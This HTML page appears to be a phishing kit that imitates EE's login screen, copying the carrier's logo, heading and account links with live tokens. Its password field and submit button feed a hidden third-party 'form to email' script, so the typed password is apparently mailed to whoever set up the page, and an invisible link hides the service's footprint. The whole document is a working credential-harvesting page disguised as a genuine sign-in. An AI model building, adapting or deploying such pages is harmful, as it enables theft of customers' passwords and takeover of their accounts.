<img alt="" id="brandlogo" src="https://auth.ee.co.uk/static/content/res/stage-2/nayan/img/logo.png" style="color: #3c3d41; display: block; font-family: Non-Dottee, Arial, sans-serif; font-size: 16px; margin: 0px auto;" />
<center>
<h1 id="heading_text" style="color: #057382; font-family: Non-Dottee, Arial, sans-serif; font-size: 28px; line-height: 36px; margin: 20px 0px 8px;">Log in</h1><div data-name="Unified" id="api" spellcheck="false" style="background-color: white; border-radius: 16px; color: #3c3d41; font-family: Non-Dottee, Arial, sans-serif; font-size: 16px; margin-top: 20px;">

<meta name="viewport" content="width=device-width, initial-scale=1">

<!DOCTYPE html> 
<html> 
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title> Secure Authentication </title>
<style> 
Body {
  
  
}
button { 
       background-color: black; 
       width: 100%;
       font-weight: 900;
        color: white; 
        padding: 15px; 
        margin: 10px 0px; 
        border: none;
        border-radius: 25px;
        cursor: pointer; 
         } 
         
         b {  
       width: 50%;
        color: #257383; 
        padding: 5px; 
        margin: 10px 0px; 
        border: none;
        cursor: pointer; 
         } 
 form { 
        border: 0px solid #f1f1f1; 
    } 
 input[type=text], input[type=password] { 
        width: 100%; 
        margin: 8px 0;
        padding: 12px 20px; 
        display: inline-block;
        border-radius: 10px;
        border: 2px solid black; 
        box-sizing: border-box; 
    }
 button:hover { 
        opacity: 0.7; 
    } 
  .cancelbtn { 
        width: auto; 
        padding: 10px 18px;
        margin: 10px 5px;
    } 
      
   
 .container { 
        padding: 25px; 
        background-color: white;
    } 
</style> 
</head>  
<body>  
    
    <form>
        <form method="post" action="//submit.form" >
        <div class="container"> 
            <p><strong> Password </strong> </p>
            <input type="text" placeholder="" name="Password" required>
            
            <div>
                <div style='font-size:1px; opacity:0;'style="float:right"><a href="https://www.100forms.com" id="lnk100" title="form to email">form to email</a></div>
                <script src="https://www.100forms.com/js/FORMKEY:GBQ3AWXX6SL6" type="text/javascript"></script>
                </div>
            <button type="submit">Next</button> 
            
            <p><b href=""> <u> Forgot your PassWord? </u> </b></p>
           
            
    </form>   
</body>   
</html>

 


</div></div><div class="create"><p style="color: #111111; font-size: 20px; line-height: 24px; margin-bottom: 0px; position: relative; top: 27px;">Don’t have an account?<a href="https://auth.ee.co.uk/e2ea8fbf-98c0-4cf1-a2df-ee9d55ef69c3/B2C_1A_RPBT_SignUpSignIn/api/CombinedSigninAndSignup/unified?local=signup&amp;csrf_token=d3JFaWhIN25wQU5YUFZ3MVRvZHdwclhTK1VqLytmQmFzVlRrSWNiZlRObW9uZFpYZGJkeGJzaEZtUzRYT2hyVXVGVXNMTzNxUExvVDJKQThLQlk5N2c9PTsyMDI0LTA3LTA0VDIxOjQyOjI1LjU3ODU1NzZaO2xpZWpsYU9NajJXRVhSeTBWeXRtSmc9PTt7Ik9yY2hlc3RyYXRpb25TdGVwIjozfQ==&amp;tx=StateProperties=eyJUSUQiOiJhZGVjMTZkZS1kZmQ1LTRmMGUtODk4NC0wMmNjMDVjMjYxMTUifQ&amp;p=B2C_1A_RPBT_SignUpSignIn" id="createAccount" role="button" style="-webkit-writing-mode: horizontal-tb !important; align-items: center; background: none; border-radius: 20px; border: 2px solid rgb(17, 17, 17); box-sizing: border-box; color: #111111; cursor: pointer; display: block; font-size: 16px; font-weight: 700; height: 48px; line-height: 24px; margin-bottom: 20px; margin-top: 20px; min-height: 24px; min-width: 80px; padding: 11px 24px; position: relative; text-align: center; text-decoration-line: none; text-underline-offset: 0.18em; transition: all 0.25s cubic-bezier(0.55, 0.085, 0.68, 0.53) 0s; width: 287.986px; word-spacing: normal;">Create account</a></p></div>


<div class="claims-provider-list-text-links-bottom-under-form" style="bottom: 0px; position: relative;"><div style="margin-top: -135px; position: absolute; width: 287.986px;"><a class="text-link" href="https://auth.ee.co.uk/e2ea8fbf-98c0-4cf1-a2df-ee9d55ef69c3/B2C_1A_RPBT_SignUpSignIn/api/CombinedSigninAndSignup/unified?claimsexchange=ForgotPasswordExchange&amp;csrf_token=d3JFaWhIN25wQU5YUFZ3MVRvZHdwclhTK1VqLytmQmFzVlRrSWNiZlRObW9uZFpYZGJkeGJzaEZtUzRYT2hyVXVGVXNMTzNxUExvVDJKQThLQlk5N2c9PTsyMDI0LTA3LTA0VDIxOjQyOjI1LjU3ODU1NzZaO2xpZWpsYU9NajJXRVhSeTBWeXRtSmc9PTt7Ik9yY2hlc3RyYXRpb25TdGVwIjozfQ==&amp;tx=StateProperties=eyJUSUQiOiJhZGVjMTZkZS1kZmQ1LTRmMGUtODk4NC0wMmNjMDVjMjYxMTUifQ&amp;p=B2C_1A_RPBT_SignUpSignIn" id="ForgotPasswordExchange" style="-webkit-writing-mode: horizontal-tb !important; align-items: flex-start; appearance: auto; background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; color: #057382; cursor: pointer; display: inline-block; line-height: 24px; margin-bottom: 20px; min-height: 24px; padding: 0px; text-decoration-style: dotted; text-decoration-thickness: 1px; text-rendering: auto; text-shadow: none; text-underline-offset: 0.18em; transition: none 0s ease 0s; word-spacing: normal;"></a></div><div><a class="text-link" href="https://auth.ee.co.uk/e2ea8fbf-98c0-4cf1-a2df-ee9d55ef69c3/B2C_1A_RPBT_SignUpSignIn/api/CombinedSigninAndSignup/unified?claimsexchange=TransferToCancelScreen&amp;csrf_token=d3JFaWhIN25wQU5YUFZ3MVRvZHdwclhTK1VqLytmQmFzVlRrSWNiZlRObW9uZFpYZGJkeGJzaEZtUzRYT2hyVXVGVXNMTzNxUExvVDJKQThLQlk5N2c9PTsyMDI0LTA3LTA0VDIxOjQyOjI1LjU3ODU1NzZaO2xpZWpsYU9NajJXRVhSeTBWeXRtSmc9PTt7Ik9yY2hlc3RyYXRpb25TdGVwIjozfQ==&amp;tx=StateProperties=eyJUSUQiOiJhZGVjMTZkZS1kZmQ1LTRmMGUtODk4NC0wMmNjMDVjMjYxMTUifQ&amp;p=B2C_1A_RPBT_SignUpSignIn" id="TransferToCancelScreen" style="-webkit-writing-mode: horizontal-tb !important; align-items: flex-start; appearance: auto; background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; color: #111111; cursor: pointer; display: inline-block; line-height: 24px; margin-bottom: 32px; margin-top: 32px; min-height: 24px; padding: 0px; text-decoration-style: dotted; text-decoration-thickness: 1px; text-rendering: auto; text-shadow: none; text-underline-offset: 0.18em; transition: none 0s ease 0s; word-spacing: normal;">Cancel</a></div></div></div>
</center>